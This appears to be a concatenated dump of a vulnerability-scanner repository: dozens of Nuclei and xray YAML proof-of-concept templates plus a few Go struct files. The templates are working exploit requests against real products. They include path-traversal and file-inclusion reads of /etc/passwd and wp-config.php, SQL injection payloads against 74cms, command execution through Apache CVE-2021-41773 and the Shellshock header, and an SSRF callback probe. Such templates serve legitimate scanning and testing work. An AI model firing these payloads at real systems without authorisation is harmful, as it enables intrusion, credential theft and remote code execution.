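/pocs_yml/nucleiFiles/vulnerabilities/weaver/ecology/ecology-filedownload-directory-traversal.yaml:
--------------------------------------------------------------------------------
id: ecology-filedownload-directory-traversal

info:
  name: Ecology Directory Traversal
  author: princechaddha
  severity: medium
  metadata:
    fofa-query: app="泛微-协同办公OA"
  tags: ecology,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      # NOTE(review): "/weaver/" is a weak marker for web.xml content; any 200
      # page that links back under /weaver/ would satisfy it. The word looks
      # like it lost surrounding markup in extraction — confirm against the
      # upstream template before relying on results.
      - type: word
        words:
          - "/weaver/"
        part: body

--------------------------------------------------------------------------------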
/pocs_yml/nucleiFiles/vulnerabilities/weaver/ecology/ecology-springframework-directory-traversal.yaml: -------------------------------------------------------------------------------- 1 | id: ecology-springframework-directory-traversal 2 | 3 | info: 4 | name: Ecology Springframework Directory Traversal 5 | author: princechaddha 6 | severity: medium 7 | tags: ecology,springframework,lfi 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml" 13 | matchers-condition: and 14 | matchers: 15 | - type: status 16 | status: 17 | - 200 18 | - type: word 19 | words: 20 | - "/weaver/" 21 | part: body 22 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/dzs-zoomsounds-listing.yaml: -------------------------------------------------------------------------------- 1 | id: dzs-zoomsounds-listing 2 | 3 | info: 4 | name: WordPress Plugin dzs zoomsounds 5 | author: pussycat0x 6 | severity: info 7 | description: Searches for sensitive directories present in the wordpress-plugins plugin. 
8 | tags: wordpress,listing,wp-plugin,wp 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/wp-content/plugins/dzs-zoomsounds/" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "Index of" 20 | - "/wp-content/plugins/dzs-zoomsounds" 21 | condition: and 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/sniplets-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: sniplets-lfi 2 | 3 | info: 4 | name: Wordpress Plugin Sniplets 1.1.2 - LFI 5 | author: dhiyaneshDK 6 | severity: high 7 | reference: 8 | - https://www.exploit-db.com/exploits/5194 9 | tags: wordpress,wp-plugin,lfi,wp 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: body 20 | words: 21 | - "DB_NAME" 22 | - "DB_PASSWORD" 23 | condition: and 24 | 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-affiliatewp-log 2 | 3 | info: 4 | name: WordPress Plugin "AffiliateWP -- Allowed Products" Log Disclosure 5 | author: dhiyaneshDK 6 | severity: low 7 | tags: wordpress,log,plugin 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/wp-content/uploads/affwp-debug.log' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'Referral could not be retrieved' 19 | - 'Affiliate CSV' 20 | 21 | - type: word 22 | words: 23 | - 'text/plain' 24 | part: header 25 | 26 | - type: status 27 | status: 28 | - 200 29 | 
-------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wordpress-db-backup-listing.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-db-backup-listing 2 | 3 | info: 4 | name: WordPress DB Backup 5 | author: Suman_Kar 6 | severity: medium 7 | tags: wordpress,backup 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/wp-content/uploads/database-backups/" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "Index of /" 19 | - "wp-content/uploads/database-backups" 20 | - ".sql" 21 | condition: and 22 | part: body 23 | 24 | - type: status 25 | status: 26 | - 200 -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wordpress-db-backup.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-db-backup 2 | 3 | info: 4 | name: WordPress DB Backup 5 | author: dwisiswant0 6 | severity: medium 7 | tags: wordpress,backups 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/wp-content/backup-db/" 13 | matchers-condition: and 14 | matchers: 15 | - type: word 16 | words: 17 | - "Index of /" 18 | - ".sql\">" 19 | condition: and 20 | part: body 21 | - type: status 22 | status: 23 | - 200 -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wordpress-debug-log.yaml: -------------------------------------------------------------------------------- 1 | id: wp-debug-log 2 | 3 | info: 4 | name: WordPress debug log 5 | author: geraldino2,dwisiswant0 6 | severity: low 7 | tags: wordpress,log 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/wp-content/debug.log" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - octet-stream 19 | - text/plain 20 | 
part: header 21 | condition: or 22 | 23 | - type: regex 24 | regex: 25 | - "[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}] PHP" 26 | part: body 27 | 28 | - type: status 29 | status: 30 | - 200 -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wordpress-directory-listing.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-directory-listing 2 | 3 | info: 4 | name: Wordpress directory listing 5 | author: Manas_Harsh 6 | severity: info 7 | tags: wordpress 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/wp-content/uploads/" 13 | - "{{BaseURL}}/wp-content/themes/" 14 | - "{{BaseURL}}/wp-content/plugins/" 15 | - "{{BaseURL}}/wp-includes/" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: status 20 | status: 21 | - 200 22 | 23 | - type: word 24 | words: 25 | - "Index of /" 26 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wordpress-installer-log.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-installer-log 2 | 3 | info: 4 | name: WordPress Installer Log 5 | author: dwisiswant0 6 | severity: info 7 | tags: wordpress,log 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/installer-log.txt" 13 | matchers-condition: and 14 | matchers: 15 | - type: regex 16 | regex: 17 | - "(?mi)DUPLICATOR(-|\\s)?(PRO|LITE)?:? 
INSTALL-LOG" 18 | part: body 19 | - type: status 20 | status: 21 | - 200 -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-social-metrics-tracker 2 | 3 | info: 4 | name: Social Metrics Tracker <= 1.6.8 - Unauthorised Data Export 5 | author: randomrobbie 6 | severity: medium 7 | tags: wordpress,wp-plugin 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | - type: word 20 | words: 21 | - "Main URL to Post" 22 | part: body -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-ssrf-oembed 2 | 3 | info: 4 | name: Wordpress Oembed Proxy SSRF 5 | author: dhiyaneshDk 6 | severity: medium 7 | reference: 8 | - https://book.hacktricks.xyz/pentesting/pentesting-web/wordpress 9 | - https://github.com/incogbyte/quickpress/blob/master/core/req.go 10 | tags: wordpress,ssrf,oast,proxy 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}}/" 16 | 17 | matchers: 18 | - type: word 19 | part: interactsh_protocol 20 | words: 21 | - "http" 22 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml: -------------------------------------------------------------------------------- 1 | id: updraftplus-pem-keys 2 | 3 | info: 4 | name: UpdraftPlus Plugin Pem Key 5 | author: dhiyaneshDk 6 | severity: info 7 | 
reference: 8 | - https://www.exploit-db.com/ghdb/6437 9 | tags: wordpress,wp-plugin 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/wp-content/plugins/updraftplus/includes/' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "Index of /" 21 | - ".pem" 22 | - "updraftplus" 23 | condition: and 24 | part: body 25 | 26 | - type: status 27 | status: 28 | - 200 29 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wordpress-user-enum.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-user-enum 2 | 3 | info: 4 | name: Wordpress User Enumeration 5 | author: r3dg33k 6 | severity: info 7 | tags: wordpress 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/?author=1" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: regex 17 | regex: 18 | - '(?i)Location: http(s|):\/\/[\w\.\-]+\/author\/\w+' 19 | part: header 20 | - type: status 21 | status: 22 | - 301 23 | 24 | extractors: 25 | - type: regex 26 | part: header 27 | regex: 28 | - 'author\/\w+' 29 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wp-config-setup.yaml: -------------------------------------------------------------------------------- 1 | id: wp-config-setup 2 | 3 | info: 4 | name: WordPress Setup Configuration 5 | author: princechaddha 6 | severity: high 7 | reference: 8 | - https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/ 9 | tags: wordpress,setup 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/wp-admin/setup-config.php?step=1" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "Below you should enter your database connection details." 
21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wp-enabled-registration.yaml: -------------------------------------------------------------------------------- 1 | id: wp-enabled-registration 2 | 3 | info: 4 | name: WordPress user registration enabled 5 | author: Ratnadip Gajbhiye 6 | severity: info 7 | tags: wordpress 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/wp-login.php?action=register' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - Register For This Site 19 | - E-mail 20 | condition: and 21 | part: body 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wp-full-path-disclosure.yaml: -------------------------------------------------------------------------------- 1 | id: wp-full-path-disclosure 2 | 3 | info: 4 | name: Wordpress - Path Disclosure 5 | author: arcc 6 | severity: info 7 | reference: 8 | - https://make.wordpress.org/core/handbook/testing/reporting-security-vulnerabilities/#why-are-there-path-disclosures-when-directly-loading-certain-files 9 | - https://core.trac.wordpress.org/ticket/38317 10 | tags: debug,wordpress,fpd 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/wp-includes/rss-functions.php" 16 | 17 | matchers: 18 | - type: word 19 | words: 20 | - 'Call to undefined function _deprecated_file()' 21 | part: body 22 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wp-install.yaml: -------------------------------------------------------------------------------- 1 | id: wp-install 2 | 3 | info: 4 | name: WordPress Exposed Installation 5 | author: princechaddha 6 | severity: high 7 | reference: 8 | - 
https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/ 9 | tags: wordpress 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/wp-admin/install.php" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "WordPress › Installation" 21 | - "Site Title" 22 | condition: and 23 | 24 | - type: status 25 | status: 26 | - 200 -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wp-license-file.yaml: -------------------------------------------------------------------------------- 1 | id: wp-license-file 2 | 3 | info: 4 | name: WordPress license file disclosure 5 | author: yashgoti 6 | severity: info 7 | tags: wordpress 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/license.txt" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "WordPress - Web publishing software" 19 | 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wp-popup-listing.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-popup-listing 2 | 3 | info: 4 | name: WordPress Popup Plugin Directory Listing 5 | author: aashiq 6 | severity: info 7 | description: Searches for sensitive directories present in the wordpress-popup plugin. 
8 | tags: wordpress,listing,plugin 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/wp-content/plugins/wordpress-popup/views/admin/" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | 21 | - type: word 22 | words: 23 | - "Index of" 24 | - "/wp-content/plugins/wordpress-popup/views/admin" 25 | condition: and 26 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wp-qards-listing.yaml: -------------------------------------------------------------------------------- 1 | id: wp-qards-listing 2 | 3 | info: 4 | name: WordPress Plugin Qards 5 | author: pussycat0x 6 | severity: info 7 | description: Searches for sensitive directories present in the wordpress-plugins plugin. 8 | tags: wordpress,listing,wp-plugin,wp 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/wp-content/plugins/qards/" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "Index of" 20 | - "/wp-content/plugins/qards" 21 | condition: and 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: wp-simple-fields-lfi 2 | 3 | info: 4 | name: WordPress Plugin Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE 5 | author: 0x240x23elu 6 | severity: high 7 | reference: 8 | - https://packetstormsecurity.com/files/147102/WordPress-Simple-Fields-0.3.5-File-Inclusion-Remote-Code-Execution.html 9 | tags: wordpress,wp-plugin,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00" 15 | 16 | matchers: 17 | - type: regex 18 | regex: 19 | - "root:.*:0:0:" 20 | part: body 
-------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wp-super-forms.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-super-forms 2 | 3 | info: 4 | name: WordPress super-forms Plugin Directory Listing 5 | author: pussycat0x 6 | severity: low 7 | description: Searches for sensitive directories present in the wordpress-plugins plugin. 8 | reference: 9 | - https://www.exploit-db.com/ghdb/6776 10 | tags: wordpress,listing,plugin 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/wp-content/plugins/super-forms/" 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "Index of /wp-content/plugins/super-forms/" 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wp-tutor-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: wp-tutor-lfi 2 | 3 | info: 4 | name: WordPress Plugin tutor.1.5.3 - Local File Inclusion 5 | author: 0x240x23elu 6 | severity: high 7 | reference: 8 | - https://www.exploit-db.com/exploits/48058 9 | tags: wordpress,wp-plugin,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd" 15 | 16 | matchers: 17 | - type: regex 18 | regex: 19 | - "root:.*:0:0:" 20 | part: body -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wp-vault-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: wp-vault-local-file-inclusion 2 | 3 | info: 4 | name: WP Vault 0.8.6.6 Local File Inclusion 5 | author: 0x_Akoko 6 | severity: high 7 | reference: 8 | - https://www.exploit-db.com/exploits/40850 9 | tags: 
wp-plugin,wordpress,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" 15 | 16 | matchers-condition: and 17 | matchers: 18 | 19 | - type: regex 20 | regex: 21 | - "root:.*:0:0:" 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wp-xmlrpc.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-xmlrpc-file 2 | 3 | info: 4 | name: WordPress xmlrpc 5 | author: udit_thakkur 6 | severity: info 7 | tags: wordpress 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/xmlrpc.php" 13 | matchers: 14 | - type: word 15 | words: 16 | - 'XML-RPC server accepts POST requests only.' 17 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wpdm-cache-session.yaml: -------------------------------------------------------------------------------- 1 | id: wpdm-cache-session 2 | 3 | info: 4 | name: Wpdm-Cache Session 5 | author: dhiyaneshDk 6 | severity: medium 7 | reference: 8 | - https://www.exploit-db.com/ghdb/7004 9 | tags: wordpress 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/wp-content/uploads/wpdm-cache/' 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "Index of /" 20 | - ".txt" 21 | - "wpdm-cache" 22 | condition: and 23 | 24 | part: body 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wpmudev-pub-keys.yaml: -------------------------------------------------------------------------------- 1 | id: wpmudev-pub-keys 2 | 3 | info: 4 | name: Wpmudev Dashboard Pub Key 5 | author: dhiyaneshDk 6 | severity: medium 7 | reference: 8 | - 
https://www.exploit-db.com/ghdb/6443 9 | tags: wordpress 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/wp-content/plugins/wpmudev-updates/keys/' 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "Index of /" 20 | - ".pub" 21 | - "wpmudev" 22 | condition: and 23 | 24 | part: body 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/yonyou/erp-nc-directory-traversal.yaml: -------------------------------------------------------------------------------- 1 | id: erp-nc-directory-traversal 2 | 3 | info: 4 | name: ERP-NC directory traversal 5 | author: pikpikcu 6 | severity: high 7 | reference: 8 | - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g 9 | tags: lfi,erp-nc 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename=" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "Client" 21 | - "ncwslogin.jsp" 22 | - "admin.jsp" 23 | part: body 24 | condition: and 25 | 26 | - type: status 27 | status: 28 | - 200 29 |
--------------------------------------------------------------------------------
/pocs_yml/pkg/nuclei/catalog/catalogue.go:
--------------------------------------------------------------------------------
package catalog

// Catalog is a template catalog helper implementation.
// The only state visible in this file is the templates directory it was
// created with.
type Catalog struct {
	// templatesDirectory is the directory handed to New, stored as given.
	templatesDirectory string
}

// New returns a Catalog whose templatesDirectory is set to directory.
//
// The value is stored verbatim: nothing here cleans the path, checks that it
// exists, or confirms that it stays inside an expected root. Callers that take
// the directory from configuration or the command line should validate it
// before any code resolves template paths against it.
func New(directory string) *Catalog {
	catalog := &Catalog{templatesDirectory: directory}
	return catalog
}
--------------------------------------------------------------------------------
/pocs_yml/pkg/xray/structs/cache.go:
--------------------------------------------------------------------------------
package structs

import "net/http"

// HttpRequestCache groups a *http.Request with the ProtoRequest and
// ProtoResponse values kept alongside it. Request and Response are declared
// elsewhere in package structs.
//
// NOTE(review): presumably filled in when a rule sets `cache: true`; confirm
// against the caller. Responses held here can include credentials or
// configuration data returned by a target, so treat cached entries as
// sensitive when logging or persisting them.
type HttpRequestCache struct {
	Request       *http.Request // the net/http request
	ProtoRequest  *Request      // package-local request representation
	ProtoResponse *Response     // package-local response representation
}

// TCPUDPRequestCache holds the raw response bytes of a non-HTTP exchange
// together with its ProtoResponse.
//
// NOTE(review): the name suggests TCP/UDP transports; the code that populates
// it is not part of this file. No size bound on Response is enforced here.
type TCPUDPRequestCache struct {
	Response      []byte    // raw bytes as received
	ProtoResponse *Response // package-local response representation
}
--------------------------------------------------------------------------------
/pocs_yml/pkg/xray/structs/tasks.go:
--------------------------------------------------------------------------------
package structs

// Task pairs a Poc with the Target it is to be evaluated against. Poc is
// declared elsewhere in package structs.
//
// NOTE(review): the format of Target (URL, host:port, ...) is not fixed by
// this file; whoever builds a Task is responsible for restricting targets to
// the authorised scope.
type Task struct {
	Poc    Poc
	Target string
}
-------------------------------------------------------------------------------- /pocs_yml/xrayFiles/74cms-sqli-2.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-74cms-sqli-2 2 | manual: true 3 | transport: http 4 | set: 5 | rand: randomInt(200000000, 210000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{rand}}),5,6,7,8,9%23 12 | expression: response.body.bcontains(bytes(md5(string(rand)))) 13 | expression: r0() 14 | detail: 15 | author: rexus 16 | links: 17 | - https://www.uedbox.com/post/30019/ 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/74cms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-74cms-sqli 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa") and extractvalue(1,concat(0x7e,md5(99999999))) -- a 10 | expression: response.body.bcontains(b"ef775988943825d2871e1cfa75473ec") 11 | expression: r0() 12 | detail: 13 | author: jinqi 14 | links: 15 | - https://www.t00ls.net/articles-54436.html 16 | -------------------------------------------------------------------------------- 
/pocs_yml/xrayFiles/airflow-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-airflow-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /admin/ 10 | expression: response.status == 200 && response.body.bcontains(b"Airflow - DAGs") && response.body.bcontains(b"

DAGs

") 11 | expression: r0() 12 | detail: 13 | author: pa55w0rd(www.pa55w0rd.online/) 14 | links: 15 | - http://airflow.apache.org/ 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/alibaba-canal-info-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-alibaba-canal-info-leak 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /api/v1/canal/config/1/1 10 | follow_redirects: false 11 | expression: response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"ncanal.aliyun.accessKey") && response.body.bcontains(b"ncanal.aliyun.secretKey") 12 | expression: r0() 13 | detail: 14 | author: Aquilao(https://github.com/Aquilao) 15 | links: 16 | - https://my.oschina.net/u/4581879/blog/4753320 17 | info: alibaba Canal info leak 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/apache-httpd-cve-2021-41773-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-httpd-cve-2021-41773-rce 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomInt(800000000, 1000000000) 6 | r2: randomInt(800000000, 1000000000) 7 | rules: 8 | r0: 9 | request: 10 | cache: true 11 | method: POST 12 | path: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh 13 | body: echo;expr {{r1}} + {{r2}} 14 | expression: response.status == 200 && response.body.bcontains(bytes(string(r1 + r2))) 15 | expression: r0() 16 | detail: 17 | author: B1anda0(https://github.com/B1anda0) 18 | links: 19 | - https://nvd.nist.gov/vuln/detail/CVE-2021-41773 20 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/apache-kylin-unauth-cve-2020-13937.yml: -------------------------------------------------------------------------------- 1 | 
name: poc-yaml-apache-kylin-unauth-cve-2020-13937 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /kylin/api/admin/config 10 | expression: response.status == 200 && response.headers["Content-Type"].contains("application/json") && response.body.bcontains(b"config") && response.body.bcontains(b"kylin.metadata.url") 11 | expression: r0() 12 | detail: 13 | author: JingLing(github.com/shmilylty) 14 | links: 15 | - https://s.tencent.com/research/bsafe/1156.html 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/apache-nifi-api-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-nifi-api-unauthorized-access 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /nifi-api/flow/current-user 10 | follow_redirects: false 11 | expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"identity\":\"anonymous\",\"anonymous\":true") 12 | expression: r0() 13 | detail: 14 | author: wulalalaaa(https://github.com/wulalalaaa) 15 | links: 16 | - https://nifi.apache.org/docs/nifi-docs/rest-api/index.html 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/apache-storm-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-storm-unauthorized-access 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /api/v1/cluster/summary 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"{\"totalMem\":") && response.body.bcontains(b"\"stormVersion\":") 12 | expression: r0() 13 | detail: 14 | author: wulalalaaa(https://github.com/wulalalaaa) 15 | links: 16 | - 
https://storm.apache.org/releases/current/STORM-UI-REST-API.html 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/bash-cve-2014-6271.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-bash-cve-2014-6271 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomInt(800000000, 1000000000) 6 | r2: randomInt(800000000, 1000000000) 7 | rules: 8 | r0: 9 | request: 10 | cache: true 11 | method: GET 12 | headers: 13 | User-Agent: () { :; }; echo; echo; /bin/bash -c 'expr {{r1}} + {{r2}}' 14 | follow_redirects: false 15 | expression: response.body.bcontains(bytes(string(r1 + r2))) 16 | expression: r0() 17 | detail: 18 | author: neal1991(https://github.com/neal1991) 19 | links: 20 | - https://github.com/opsxcq/exploit-CVE-2014-6271 21 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/bt742-pma-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-bt742-pma-unauthorized-access 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /pma/ 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"information_schema") && response.body.bcontains(b"phpMyAdmin") && response.body.bcontains(b"server_sql.php") 12 | expression: r0() 13 | detail: 14 | author: Facker007(https://github.com/Facker007) 15 | links: 16 | - https://mp.weixin.qq.com/s/KgAaFRKarMdycYzETyKS8A 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/chinaunicom-modem-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-chinaunicom-modem-default-password 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /cu.html 
